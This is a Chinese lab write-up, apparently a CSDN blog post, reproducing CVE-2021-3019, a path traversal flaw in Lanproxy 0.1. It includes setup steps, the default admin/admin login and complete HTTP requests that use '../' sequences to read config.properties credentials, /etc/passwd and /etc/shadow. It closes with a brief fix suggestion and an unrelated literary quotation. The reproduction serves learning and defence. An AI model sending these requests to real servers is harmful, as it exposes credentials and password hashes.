Lanproxy 任意文件读取漏洞复现 (CVE-2021-3019)

谁借莪１个温暖的怀抱￠ 2023-01-12 01:48 159阅读 0赞

学习文档下载

https://download.csdn.net/download/qq_41901122/14944324

### 文章目录 ###

*   *   *  漏洞名称
         *  漏洞编号
         *  漏洞描述
         *  影响版本
         *  实验环境及准备
         *   *  第一步 安装java环境
             *  第二步 下载proxy-server-0.1.zip，并放入/usr/local目录下
             *  第三步 访问网站
         *  漏洞复现
         *  修复建议
         *  摘抄

### 漏洞名称 ###

*  Lanproxy 任意文件读取漏洞复现

### 漏洞编号 ###

*  CVE-2021-3019

### 漏洞描述 ###

*  Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具，支持tcp流量转发，可支持任何tcp上层协议（访问内网网站、本地支付接口调试、ssh访问、远程桌面等等）
 *  本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过…/绕过读取任意文件。
 *  该漏洞允许目录遍历读取/…/conf/config.properties来获取到内部网连接的凭据。

### 影响版本 ###

*  lanproxy 0.1

### 实验环境及准备 ###

#### 第一步 安装java环境 ####

java -version

![在这里插入图片描述][20210127155627879.png]

#### 第二步 下载proxy-server-0.1.zip，并放入/usr/local目录下 ####

cd /usr/local/proxy-server-0.1/bin
    chmod +x startup.sh
    ./startup.sh

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1]

#### 第三步 访问网站 ####

http://192.168.232.183:8090/
    admin/admin

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2]

http://192.168.232.183:8090/lanproxy-config/

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3]

### 漏洞复现 ###

/../conf/config.properties
    请求数据包
    GET  /../conf/config.properties HTTP/1.1
    Host: 192.168.232.183:8090
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
    Accept: text/plain, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Connection: close
    Referer: http://192.168.232.183:8090/

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 4]

/../../../../../../../../../etc/passwd
    请求数据包：
    GET /../../../../../../../../../etc/passwd HTTP/1.1Host: 192.168.232.183:8090
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
    Accept: text/plain, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Connection: close
    Referer: http://192.168.232.183:8090/

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 5]

GET /../../../../../../../../../etc/shadow HTTP/1.1
    Host: 192.168.232.183:8090
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
    Accept: text/plain, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Connection: close
    Referer: http://192.168.232.183:8090/

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 6]

### 修复建议 ###

*  升级版本，和防火墙做相关路径…/跳跃限制。

### 摘抄 ###

童年就像童话  
这就他们在童话里第一次相遇  
那么热的夏天  
少年的背后被女孩的悲伤烫出一个洞  
一直贯穿的心脏  
\----《云边有个小卖部》\*\*

[20210127155627879.png]: /images/20221119/1771f89b7a314010a8c6132279c58f7d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70]: /images/20221119/b0efa477895f4509ad702accb2be84b7.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1]: /images/20221119/c12a58eaa49f45c796f4fcdb666f864c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2]: /images/20221119/20a96402cbb442799024c4f68b15cc2b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3]: /images/20221119/5568763817064fa78c88d290e44ab89f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 4]: /images/20221119/1c11c7d694d24dfba9dc488041549a6a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 5]: /images/20221119/473d001c1e3f459983c21c7da7497247.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 6]: /images/20221119/e7ccf28dff61480bac219c441b56b03d.png